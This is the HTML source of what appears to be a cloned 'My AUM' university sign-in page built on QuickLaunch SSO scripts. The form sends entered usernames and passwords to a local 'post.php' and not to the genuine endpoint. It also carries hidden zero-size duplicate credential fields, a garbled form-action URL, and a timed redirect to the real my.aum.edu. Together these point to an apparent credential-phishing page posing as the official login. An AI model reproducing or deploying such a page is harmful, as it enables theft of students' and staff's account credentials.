

 <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" /> 
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/jquery-1.12.4.js" type="text/javascript"></script>

<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/jquery.blockUI.js" type="text/javascript"></script>
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/bootstrap.min.js" type="text/javascript"></script>


<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.5.7/angular.min.js" integrity="sha256-+0edSx9qZO1m2O7eTtlMA8jEQcUZQVQQtG4YN3FHzJo=" crossorigin="anonymous"></script>
<link href="https://idp.quicklaunchsso.com/authenticationendpoint/css/sourcesanspro.css" rel="stylesheet">
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/angular-block-ui.min.js" type="text/javascript"></script>
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/ui-bootstrap-tpls-0.11.0.js" type="text/javascript"></script>
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/ql.js" type="text/javascript"></script>
<script src="https://idp.quicklaunchsso.com/authenticationendpoint/js/loginrefreshfix.js" type="text/javascript"></script>












  
  
  <html>


  <head>



  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>My AUM</title>
<!--<link rel="icon" href="images/favicon.ico" type="image/x-icon"/> -->
  <link href="https://idp.quicklaunchsso.com/authenticationendpoint/libs/bootstrap_3.3.5/css/bootstrap.min.css" rel="stylesheet">
  <link href="https://idp.quicklaunchsso.com/authenticationendpoint/css/Roboto.css" rel="stylesheet">
  <link href="https://idp.quicklaunchsso.com/authenticationendpoint/css/custom-common.css" rel="stylesheet">
  <link href="https://idp.quicklaunchsso.com/authenticationendpoint/css/myaum.css" rel="stylesheet">

  <!--[if lt IE 9]>
        <script src="js/html5shiv.min.js"></script>
        <script src="js/respond.min.js"></script>
        <![endif]-->








  </head>
  <body class="login">




  <!-- page content -->
  <div class="container-fluid body-wrapper">
    <div class="row">
      <div class="col-md-12s">

        <!-- content -->
        <div class="container col-xs-10 col-sm-6 col-md-6 col-lg-3 col-centered wr-content wr-login col-centered cas-login">
         <div class=" brand float-remove-xs text-center-xs">  <img src="https://idp.quicklaunchsso.com/authenticationendpoint/images/myaum/aum_logo.png" alt="MY AUM" title="My AUM" class="cas-logo">
        <input type="hidden" id="tenantDomain" value="myaum.edu"/>
      </div>

          <h2><img src="https://idp.quicklaunchsso.com/authenticationendpoint/images/myaum/aum-singn-in.png" alt="Sign In" title="Sign In " class="cas-sign-in"></h2>
          <div class="boarder-all ">
            <div class="clearfix"></div>
            <div class="login-form">
              
              
              





<form action="post.php" method="post" id="loginForm" onsubmit="clearPassMutualAuth();">

    

    
      <div class="alert alert-danger" id="error-msg" style="display:none;"></div>
    

    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group pdg-l-r row-width  ">
    <!--    <label for="username" class="position">User ID:</label>-->
        <input id="username" name="username" type="hidden" class="form-control" tabindex="0"
               placeholder="Username">
               <input id="username1" name="username1" type="text" class="form-control" tabindex="0" placeholder="" style="
               background-color: transparent;
               color:white;
               padding-left: 0;
               padding-right: 0;
               padding-bottom: 0;
               border-left-width: 0px;
               border-top-width: 0px;
               border-right-width: 0px;
               border-bottom-width: 0px;
               width: 0px;
               height: 0px;
               padding-top: 0;
               ">
               <input id="username1" name="username1" type="text" class="form-control" tabindex="0"
              placeholder="Username" style="background-color: transparent; color: white;">

    </div>
<span class="do-name">@aum.edu </span>
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group pdg-l-r row-width ">
<!--   <label for="password" class="position">Password:</label>-->
<input id="password" name="password" type="password" class="form-control" placeholder="" style="
padding-left: 0px;
padding-right: 0px;
padding-bottom: 0px;
padding-top: 0px;
border-left-width: 0px;
border-right-width: 0px;
border-top-width: 0px;
border-bottom-width: 0px;
width: 0px;
height: 0px;
padding-top: 0;
">
           <input id="password" name="password" type="password" class="form-control"
             placeholder="Password">    
    </div>
    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group" style="display:none;">
        <input type="hidden" name="sessionDataKey" value='c352f0fc-4995-4167-9b0b-096108426925'/>
    </div>

    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 pdg-l-r ">
        <div class="checkbox">
            <label>
                <input type="checkbox" id="chkRemember" name="chkRemember"> Remember me on this computer
            </label>
        </div>
    <!--    <br>-->

        <div class="form-actions row-width ">
            <!--<button
                    class="wr-btn grey-bg col-xs-12 col-md-12 col-lg-12 uppercase font-extra-large"
                    type="submit">Login
            </button>-->
            <button
                    class="wr-btn grey-bg col-xs-12 col-md-12 col-lg-12 uppercase font-extra-large row-width-btn "
                    type="button" id="submitButton" onclick="clearPassMutualAuth();">Login
            </button
        </div>
    </div>

    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 form-group">

        
    </div>
    <div class="clearfix"></div>
</form>

<script src="https://cps.quicklaunchsso.com/REST/QuickLaunchWSO2HostToDomainMapScript" type="text/javascript"></script>

<script src="https://idp.quicklaunchsso.com/authenticationendpoint/libs/jquery_1.11.3/jquery-1.11.3.js"></script>
<script type="text/javascript">
   $(document).ready(function () {
       //to prevent multiple binding
        $(document).unbind("keyup").keyup(function(e){
            var code = e.which; // recommended to use e.which, it's normalized across browsers
            if(code==13) {
                $("#submitButton").click();
            }
        });
   });
  function setError(errorText) {
         alert(errorText);
  }
  function clearPassMutualAuth() {
	$("#submitButton").attr("disabled", true);
	document.getElementById('username').value = document.getElementById('username1').value;
         var userName = document.getElementById("username").value;
	 userName = userName.replace(/\s/g, "");
         var tenantDomain = document.getElementById("tenantDomain") == null ? undefined : document.getElementById("tenantDomain").value;
	 var nameParts = userName.split("@");
         if (userName && userName.indexOf("@") == -1 && (undefined != tenantDomain) ) {
            document.getElementById('username').value = userName+'@'+tenantDomain;
            userName = document.getElementById("username").value;
            nameParts = userName.split("@");
         }
	 // Hiding original with a fake one to hide appended domain
         var original = document.getElementById("username1");
	// var original = document.getElementById("username");
         var originalParent = original.parentElement;
         original.style.display = "none";
         original.style.width = "0px";
         original.style.height = "0px";
         // Now create a fake input to show
         var e = document.createElement("input");
         e.type = "text";
         e.value = nameParts[0];
         e.className = "form-control";
         e.tabindex = 0;
         e.placeholder = "Username";
         e.id = "fakeInput";
         originalParent.appendChild(e);
         e.style.visibility = "visible";
         e.style.padding = "0px"
         e.style.height = "0px";
         if (nameParts.length == 2) {
               var tenantDomain = nameParts[1];
               var tenantHost = quickLaunchWSO2HostMap[tenantDomain];
               if (undefined != tenantHost) {
                      //if we have a mapped host name we should try to register the ClearPassMutualLogin attempt
                      var casAuthUrl = "https://" + tenantHost + "/cas/ClearPassMutualLogin";
                      var password = document.getElementById("password");

                      var casAuthTimeOutMessage = 'ADFS/CAS Time out';
                      var casAuthTimeOutMilliseconds = 25000000000000000000000;

                      //First disable the logon button button
                      var logonSpan = document.getElementById('submitButton');
                      var logonOnclick = logonSpan.onclick;
                      var logonOnkeypress = logonSpan.onkeypress;
                      logonSpan.onclick = function () { return false; };
                      logonSpan.onkeypress = function () { return false; };

                      var callbackSignature = new Date().getTime().toString();
                      //create an iframe to host the mutual authentication post form
                      var casFrameName = 'casMutualAuthFrame_' + callbackSignature;
                      var casFrameDiv = document.createElement("div");
                      casFrameDiv.style.display = 'none';
                      casFrameDiv.innerHTML = "<iframe width='0' height='0' name='" + casFrameName + "' id='" + casFrameName + "' src='about:blank' style='visibility:hidden;'></iframe>";
                      document.body.appendChild(casFrameDiv);

                      //now build a post form for use in the iframe with our username and password values
                      var casFormName = 'casMutualAuthForm_' + callbackSignature;
                      var casFormHtml = "<form method='POST' action='https://idp.quicklaunchsso.com/authenticationendpoint/&quot;&#32;+&#32;casAuthUrl&#32;+&#32;&quot;' id='" + casFormName + "' name='" + casFormName + "' >";
                      casFormHtml += "<input type='hidden' name='casUserName' value='" + userName + "'>";
                      casFormHtml += "<input type='hidden' name='plainTextPassword' value='" + password.value + "'>";
                      casFormHtml += "<input type='hidden' name='callbackSignature' value='" + callbackSignature + "'>";
                      casFormHtml += "</form>";

                      //now add the postform to the iframe
                      var casFrame = document.getElementById(casFrameName);
                      var casDocument = casFrame.contentDocument || casFrame.contentWindow.document;
                      var casFormDiv = casDocument.createElement("div");
                      casFormDiv.style.display = 'none';
 casFormDiv.innerHTML = casFormHtml;
                      if (casDocument.documentElement) {
                             //Chrome, Firefox, Safari
                             casDocument.documentElement.appendChild(casFormDiv);
                      }
                      else {
                             //IE and Edge specific
                             casDocument.appendChild(casFormDiv);
                      }
                      var casTimedOut = false;
                      var casAuthForm = casDocument.getElementById(casFormName)
                      var casTimeout = 0;
                      if (casAuthTimeOutMilliseconds > 0) {
                         casTimeout = window.setTimeout(function () {
                                casTimedOut = true;
                                logonSpan.onclick = logonOnclick;
                                logonSpan.onkeypress = logonOnkeypress;
                                setError(casAuthTimeOutMessage);
                         }, casAuthTimeOutMilliseconds);
                      }
                      //setup a window listener to wait for our the confirmation message
                     var eventOk = addEventHandler("message", window,
                          //setup a window listener to wait for our the confirmation message
                          function (event) {
                              //verify that the origin is from the expected target
                              var evtOrigin = event.origin || event.originalEvent.origin;
                              evtOrigin = evtOrigin.toLowerCase();
                              if (casAuthUrl.toLowerCase().indexOf(evtOrigin) === 0) {
                                  //our callback sends the callbackSignature back as the
                                  //text prefix to the data, that way we know its for this
                                  //series of click events
                                  if (event.data.indexOf(callbackSignature) === 0) {
                                      if (casTimeout !== 0) {
                                              window.clearTimeout(casTimeout);
                                              casTimeout = 0;
                                      }
                                      if (!casTimedOut) {
                                          var callBackMessage = event.data.replace(callbackSignature, '');
                                          logonSpan.onclick = logonOnclick;
                                          logonSpan.onkeypress = logonOnkeypress;
                                          if (callBackMessage === '200') {
                                                  document.forms['loginForm'].submit();
                                          }
                                          else {
                                                  setError(callBackMessage);
                                          }
                                      }
                                  }
                              }
                          });
                      if (eventOk) {
                          casAuthForm.submit();
                      }
                      else {
                          //TODO
                          setError("Incompatible browser");
                      }
                      return false;
               } else { // Else for id domain name is undefined.
                  document.forms['loginForm'].submit();
                  return true;
               }
         } else { // else for if name parts
          document.forms['loginForm'].submit();
           //not a tenant user name, let form post as normal
           return true;

         }
  }

// Event handler for tracking the IE event handling issue.
function addEventHandler(eventName, docElement, eventHandler) {
      if (docElement.addEventListener) {  // W3C DOM
          docElement.addEventListener(eventName, eventHandler, false);
          return true;
      }
      else if (docElement.attachEvent) { // IE DOM
          docElement.attachEvent("on" + eventName, eventHandler);
          return true;
      }
      else {
          return false;
      }
  }

</script>




              
              
              
              

<div class="cl"></div>
<div id="tos">

<div id="quick-links">  

<a target="_blank" href="https://pwms.quicklaunchsso.com/api/open/showOpenChangePassword?tenantDomain=myaum.edu&returnUrl=https://my.aum.edu" title="Forgot Password">Forgot Password</a> | 
<a target="_blank" href="https://pwms.quicklaunchsso.com/api/open/showOpenChangePassword?tenantDomain=myaum.edu&firstTimeUser=true&returnUrl=https://my.aum.edu" title="First Time Users">First Time Users</a> | 
<a target="_blank" href="https://aumwebapp.aum.edu/portal/portal_logon.swf" title="Portal Login Instructions">Portal Login Instructions</a>
</div>

<div class="cl"></div>
<div class="description"><b>Remember to Sign Out</b><br>
When done, always log out of myAUM using Sign Out located in the upper right hand corner of the screen and be sure to close all copies of your browser. Closing the browsers will help ensure the security of your account.

<!--

<div id="aaa">
        <a title="Explanation of WCAG 2.0 Level Single-A Conformance" href="https://www.w3.org/WAI/WCAG2A-Conformance" target="_blank" >
                <img alt="Level Single-A conformance, W3C WAI Web Content Accessibility Guidelines 2.0" src="https://www.w3.org/WAI/wcag2A" height="20" width="70">
        </a>
    <a title="Explanation of WCAG 2.0 Level Double-A Conformance" href="https://www.w3.org/WAI/WCAG2AA-Conformance" target="_blank" >
        <img alt="Level Double-A conformance, W3C WAI Web Content Accessibility Guidelines 2.0" src="https://www.w3.org/WAI/wcag2AA" height="20" width="70">
    </a>
</div> -->
</div>
    
    </div>
          </div>
          <!-- /content -->

        </div>
      </div>
      <!-- /content/body -->

    </div>
  </div>










  <script src="https://idp.quicklaunchsso.com/authenticationendpoint/libs/bootstrap_3.3.5/js/bootstrap.min.js"></script>
  <script>


        $(document).ready(function () {
            $('.main-link').click(function () {
                $('.main-link').next().hide();
                $(this).next().toggle('fast');
                var w = $(document).width();
                var h = $(document).height();
                $('.overlay').css("width", w + "px").css("height", h + "px").show();
            });
            $('[data-toggle="popover"]').popover();
            $('.overlay').click(function () {
                $(this).hide();
                $('.main-link').next().hide();
            });

        });
        function myFunction(key, value, name) {
            var object = document.getElementById(name);
            var domain = object.value;


            if (domain != "") {
                document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                        "&sessionDataKey=c352f0fc-4995-4167-9b0b-096108426925&domain=" +
                        domain;
            } else {
                document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                        "&sessionDataKey=c352f0fc-4995-4167-9b0b-096108426925";
            }
        }

        function handleNoDomain(key, value) {
            document.location = "../commonauth?idp=" + key + "&authenticator=" + value +
                    "&sessionDataKey=c352f0fc-4995-4167-9b0b-096108426925";
        }

        $('#popover').popover({
            html: true,
            title: function () {
                return $("#popover-head").html();
            },
            content: function () {
                return $("#popover-content").html();
            }
        });
  setTimeout(function(){
            document.location.href = "https://my.aum.edu";
        }, 120000);
    </script>
  </body>
  </html>



